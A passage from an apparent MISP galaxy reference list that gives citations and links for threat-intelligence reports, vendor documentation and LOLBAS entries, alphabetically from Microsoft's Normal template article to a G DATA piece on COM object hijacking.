https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea

Microsoft Change Default Programs

Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="Microsoft Change Default Programs"

Table 13002. Table References

Links

https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs

Chaos Stolen Backdoor

Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.

The tag is: misp-galaxy:references="Chaos Stolen Backdoor"

Table 13003. Table References

Links

http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/

Wardle Persistence Chapter

Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Wardle Persistence Chapter"

Table 13004. Table References

Links

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

cisco_deploy_rsa_keys

Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.

The tag is: misp-galaxy:references="cisco_deploy_rsa_keys"

Table 13005. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436

Wikipedia Character Encoding

Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Wikipedia Character Encoding"

Table 13006. Table References

Links

https://en.wikipedia.org/wiki/Character_encoding

ClearSky Charming Kitten Dec 2017

ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="ClearSky Charming Kitten Dec 2017"

Table 13007. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

Certfa Charming Kitten January 2021

Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.

The tag is: misp-galaxy:references="Certfa Charming Kitten January 2021"

Table 13008. Table References

Links

https://blog.certfa.com/posts/charming-kitten-christmas-gift/

Proofpoint TA2541 February 2022

Larson, S. and Wise, J. (2022, February 15). Charting TA2541’s Flight. Retrieved September 12, 2023.

The tag is: misp-galaxy:references="Proofpoint TA2541 February 2022"

Table 13009. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

JPCERT ChChes Feb 2017

Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="JPCERT ChChes Feb 2017"

Table 13010. Table References

Links

http://blog.jpcert.or.jp/2017/02/chches-malware—​93d6.html

EclecticLightChecksonEXECodeSigning

Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.

The tag is: misp-galaxy:references="EclecticLightChecksonEXECodeSigning"

Table 13011. Table References

Links

https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/

Anomali MUSTANG PANDA October 2019

Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.

The tag is: misp-galaxy:references="Anomali MUSTANG PANDA October 2019"

Table 13012. Table References

Links

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

FireEye admin@338

FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.

The tag is: misp-galaxy:references="FireEye admin@338"

Table 13013. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

IronNet BlackTech Oct 2021

Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="IronNet BlackTech Oct 2021"

Table 13014. Table References

Links

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

Recorded Future RedEcho Feb 2021

Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="Recorded Future RedEcho Feb 2021"

Table 13015. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

EFF China GitHub Attack

Budington, B. (2015, April 2). China Uses Unencrypted Websites to Hijack Browsers in GitHub Attack. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="EFF China GitHub Attack"

Table 13016. Table References

Links

https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack

PaloAlto 3102 Sept 2015

Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="PaloAlto 3102 Sept 2015"

Table 13017. Table References

Links

https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

ZScaler Hacking Team

Desai, D.. (2015, August 14). Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="ZScaler Hacking Team"

Table 13018. Table References

Links

http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html

Hacker News LuckyMouse June 2018

Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.

The tag is: misp-galaxy:references="Hacker News LuckyMouse June 2018"

Table 13019. Table References

Links

https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

Dark Reading Codoso Feb 2015

Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Dark Reading Codoso Feb 2015"

Table 13020. Table References

Links

https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059

Recorded Future TAG-22 July 2021

INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.

The tag is: misp-galaxy:references="Recorded Future TAG-22 July 2021"

Table 13021. Table References

Links

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

Recorded Future Chinese Activity in Southeast Asia December 2021

Insikt Group. (2021, December 8). Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia. Retrieved September 19, 2022.

The tag is: misp-galaxy:references="Recorded Future Chinese Activity in Southeast Asia December 2021"

Table 13022. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf

Recorded Future REDDELTA July 2020

Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Recorded Future REDDELTA July 2020"

Table 13023. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

Github CHIPSEC

Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="Github CHIPSEC"

Table 13024. Table References

Links

https://github.com/chipsec/chipsec

McAfee CHIPSEC Blog

Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.

The tag is: misp-galaxy:references="McAfee CHIPSEC Blog"

Table 13025. Table References

Links

https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/

Chkrootkit Main

Murilo, N., Steding-Jessen, K. (2017, August 23). Chkrootkit. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Chkrootkit Main"

Table 13026. Table References

Links

http://www.chkrootkit.org/

Azure AD Hybrid Identity

Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD Hybrid Identity"

Table 13027. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn

show_ssh_users_cmd_cisco

Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_ssh_users_cmd_cisco"

Table 13028. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html

Cisco IOS Shellcode

George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Shellcode"

Table 13029. Table References

Links

http://2015.zeronights.org/assets/files/05-Nosenko.pdf

Cisco IOS Software Integrity Assurance - AAA

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - AAA"

Table 13030. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#38

Cisco IOS Software Integrity Assurance - Boot Information

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Boot Information"

Table 13031. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#26

Cisco IOS Software Integrity Assurance - Change Control

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Change Control. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Change Control"

Table 13032. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#31

Cisco IOS Software Integrity Assurance - Image File Verification

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Image File Verification"

Table 13033. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Cisco IOS Software Integrity Assurance - Run-Time Memory Verification

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Run-Time Memory Verification"

Table 13034. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

Cisco IOS Software Integrity Assurance - Command History

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Command History"

Table 13035. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

Cisco IOS Software Integrity Assurance - Credentials Management

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Credentials Management"

Table 13036. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#40

Cisco IOS Software Integrity Assurance - Deploy Signed IOS

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Deploy Signed IOS"

Table 13037. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#34

Cisco IOS Software Integrity Assurance - Image File Integrity

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Image File Integrity. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Image File Integrity"

Table 13038. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#30

Cisco IOS Software Integrity Assurance - Secure Boot

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Secure Boot"

Table 13039. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#35

Cisco IOS Software Integrity Assurance - TACACS

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - TACACS"

Table 13040. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#39

Cisco Traffic Mirroring

Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Traffic Mirroring"

Table 13041. Table References

Links

https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html

Talos - Cisco Attack 2022

Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.

The tag is: misp-galaxy:references="Talos - Cisco Attack 2022"

Table 13042. Table References

Links

https://blog.talosintelligence.com/recent-cyber-attack/

Citrix Bulletin CVE-2023-3519

Citrix. (2023, July 18). Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467. Retrieved July 24, 2023.

The tag is: misp-galaxy:references="Citrix Bulletin CVE-2023-3519"

Table 13043. Table References

Links

https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467

Malwarebytes Citrix Bleed November 24 2023

Pieter Arntz. (2023, November 24). Citrix Bleed widely exploited, warn government agencies. Retrieved November 30, 2023.

The tag is: misp-galaxy:references="Malwarebytes Citrix Bleed November 24 2023"

Table 13044. Table References

Links

https://www.malwarebytes.com/blog/news/2023/11/citrix-bleed-widely-exploitated-warn-government-agencies

Talent-Jump Clambling February 2020

Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Talent-Jump Clambling February 2020"

Table 13045. Table References

Links

https://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/

FireEye Clandestine Fox Part 2

Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Clandestine Fox Part 2"

Table 13046. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

Microsoft Clear-EventLog

Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Microsoft Clear-EventLog"

Table 13047. Table References

Links

https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog

Clearing quarantine attribute

Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Clearing quarantine attribute"

Table 13048. Table References

Links

https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/

NPPSPY - Huntress

Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPPSPY - Huntress"

Table 13049. Table References

Links

https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy

CL_Invocation.ps1 - LOLBAS Project

LOLBAS. (2018, May 25). CL_Invocation.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CL_Invocation.ps1 - LOLBAS Project"

Table 13050. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/

clip_win_server

Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.

The tag is: misp-galaxy:references="clip_win_server"

Table 13051. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip

Red Canary Silver Sparrow Feb2021

Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.

The tag is: misp-galaxy:references="Red Canary Silver Sparrow Feb2021"

Table 13052. Table References

Links

https://redcanary.com/blog/clipping-silver-sparrows-wings/

CL_LoadAssembly.ps1 - LOLBAS Project

LOLBAS. (2021, September 26). CL_LoadAssembly.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CL_LoadAssembly.ps1 - LOLBAS Project"

Table 13053. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/

CL_Mutexverifiers.ps1 - LOLBAS Project

LOLBAS. (2018, May 25). CL_Mutexverifiers.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CL_Mutexverifiers.ps1 - LOLBAS Project"

Table 13054. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/

Cybereason Clop Dec 2020

Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.

The tag is: misp-galaxy:references="Cybereason Clop Dec 2020"

Table 13055. Table References

Links

https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware

Mcafee Clop Aug 2019

Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.

The tag is: misp-galaxy:references="Mcafee Clop Aug 2019"

Table 13056. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/

Kaspersky Cloud Atlas December 2014

GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Kaspersky Cloud Atlas December 2014"

Table 13057. Table References

Links

https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

Rhino Labs Cloud Backdoor September 2019

Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Rhino Labs Cloud Backdoor September 2019"

Table 13058. Table References

Links

https://github.com/RhinoSecurityLabs/ccat

Google Cloud Storage

Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Google Cloud Storage"

Table 13059. Table References

Links

https://cloud.google.com/storage

Office 265 Azure Domain Availability

Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Office 265 Azure Domain Availability"

Table 13060. Table References

Links

https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure

Mandiant Cloudy Logs 2023

Pany, D. & Hanley, C. (2023, May 3). Cloudy with a Chance of Bad Logs: Cloud Platform Log Configurations to Consider in Investigations. Retrieved October 16, 2023.

The tag is: misp-galaxy:references="Mandiant Cloudy Logs 2023"

Table 13061. Table References

Links

https://www.mandiant.com/resources/blog/cloud-bad-log-configurations

win_clsid_key

Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="win_clsid_key"

Table 13062. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm

Kube Cluster Admin

kubernetes. (2021, January 16). Cluster Administration. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Cluster Admin"

Table 13063. Table References

Links

https://kubernetes.io/docs/concepts/cluster-administration/

Kube Cluster Info

kubernetes. (n.d.). cluster-info. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Cluster Info"

Table 13064. Table References

Links

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info

TechNet Cmd

Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.

The tag is: misp-galaxy:references="TechNet Cmd"

Table 13065. Table References

Links

https://technet.microsoft.com/en-us/library/bb490880.aspx

Cmd.exe - LOLBAS Project

LOLBAS. (2019, June 26). Cmd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cmd.exe - LOLBAS Project"

Table 13066. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmd/

Cmdkey.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cmdkey.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cmdkey.exe - LOLBAS Project"

Table 13067. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/

cmdl32.exe - LOLBAS Project

LOLBAS. (2021, August 26). cmdl32.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="cmdl32.exe - LOLBAS Project"

Table 13068. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/

Cmstp.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cmstp.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cmstp.exe - LOLBAS Project"

Table 13069. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmstp/

Twitter CMSTP Jan 2018

Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Twitter CMSTP Jan 2018"

Table 13070. Table References

Links

https://twitter.com/NickTyrer/status/958450014111633408

Secureworks COBALT DICKENS September 2019

Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School…Again. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT DICKENS September 2019"

Table 13071. Table References

Links

https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

Morphisec Cobalt Gang Oct 2018

Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Morphisec Cobalt Gang Oct 2018"

Table 13072. Table References

Links

https://blog.morphisec.com/cobalt-gang-2.0

Secureworks COBALT GYPSY Threat Profile

Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT GYPSY Threat Profile"

Table 13073. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

Secureworks COBALT ILLUSION Threat Profile

Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT ILLUSION Threat Profile"

Table 13074. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-illusion

PTSecurity Cobalt Dec 2016

Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.

The tag is: misp-galaxy:references="PTSecurity Cobalt Dec 2016"

Table 13075. Table References

Links

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf

CobaltStrike Daddy May 2017

Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="CobaltStrike Daddy May 2017"

Table 13076. Table References

Links

https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/

Cobalt Strike Manual 4.3 November 2020

Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Cobalt Strike Manual 4.3 November 2020"

Table 13077. Table References

Links

https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf

cobaltstrike manual

Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.

The tag is: misp-galaxy:references="cobaltstrike manual"

Table 13078. Table References

Links

https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf

TrendMicro Cobalt Group Nov 2017

Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="TrendMicro Cobalt Group Nov 2017"

Table 13079. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

PTSecurity Cobalt Group Aug 2017

Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.

The tag is: misp-galaxy:references="PTSecurity Cobalt Group Aug 2017"

Table 13080. Table References

Links

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf

Zscaler Cobian Aug 2017

Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Zscaler Cobian Aug 2017"

Table 13081. Table References

Links

https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

MACOS Cocoa

Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="MACOS Cocoa"

Table 13082. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1

code.exe - LOLBAS Project

LOLBAS. (2023, February 1). code.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="code.exe - LOLBAS Project"

Table 13083. Table References

Links

https://lolbas-project.github.io/lolbas/HonorableMentions/Code/

Dark Reading Code Spaces Cyber Attack

Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="Dark Reading Code Spaces Cyber Attack"

Table 13084. Table References

Links

https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack

Medium Ptrace JUL 2018

Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Medium Ptrace JUL 2018"

Table 13085. Table References

Links

https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be

Wikipedia Code Signing

Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="Wikipedia Code Signing"

Table 13086. Table References

Links

https://en.wikipedia.org/wiki/Code_signing

SpectorOps Code Signing Dec 2017

Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="SpectorOps Code Signing Dec 2017"

Table 13087. Table References

Links

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

CoinLoader: A Sophisticated Malware Loader Campaign

Avira. (2019, November 28). CoinLoader: A Sophisticated Malware Loader Campaign. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="CoinLoader: A Sophisticated Malware Loader Campaign"

Table 13088. Table References

Links

https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign

NYT-Colonial

Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers.. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="NYT-Colonial"

Table 13089. Table References

Links

https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html

Colorcpl.exe - LOLBAS Project

LOLBAS. (2023, June 26). Colorcpl.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Colorcpl.exe - LOLBAS Project"

Table 13090. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/

sentinelone shlayer to zshlayer

Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="sentinelone shlayer to zshlayer"

Table 13091. Table References

Links

https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/

University of Birmingham C2

Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="University of Birmingham C2"

Table 13092. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Microsoft Command-line Logging

Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Microsoft Command-line Logging"

Table 13093. Table References

Links

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Microsoft Netdom Trust Sept 2012

Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Netdom Trust Sept 2012"

Table 13094. Table References

Links

https://technet.microsoft.com/library/cc835085.aspx

Microsoft msxsl.exe

Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Microsoft msxsl.exe"

Table 13095. Table References

Links

https://www.microsoft.com/download/details.aspx?id=21714

Kettle CSV DDE Aug 2014

Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Kettle CSV DDE Aug 2014"

Table 13096. Table References

Links

https://www.contextis.com/blog/comma-separated-vulnerabilities

Microsoft CLR Integration 2017

Microsoft. (2017, June 19). Common Language Runtime Integration. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="Microsoft CLR Integration 2017"

Table 13097. Table References

Links

https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017

Palo Alto Comnie

Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.

The tag is: misp-galaxy:references="Palo Alto Comnie"

Table 13098. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

GDATA COM Hijacking

G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.

The tag is: misp-galaxy:references="GDATA COM Hijacking"

Table 13099. Table References

Links

https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

AP-NotPetya

